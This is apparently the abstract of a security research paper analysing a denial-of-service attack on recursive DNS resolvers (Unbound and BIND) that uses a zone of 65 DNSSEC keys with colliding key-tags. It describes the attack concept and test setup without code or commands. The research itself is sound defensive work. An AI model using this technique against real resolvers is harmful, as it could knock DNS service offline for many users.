DoS attack on recursive resolvers with DNSSEC key-tag collisions

DNSSEC was implemented to strengthen DNS and enable resolvers and end-users to validate the the integrity and origin of responses by using digital signatures. To speed up this verification, key-tags were introduced. In this paper we analyse an attack that uses key-tag collisions to generate enough computational overhead to render a recursive resolver unavailable (DoS attack). A zone with 65 keys with the same key-tag was set up on an authoritative name server, along with a resolver (Unbound and BIND) and an attacker, to simulate this attack. This paper concludes attempting to DoS a recursive resolver using DNSSEC key-tag collisions is viable, at least in theory.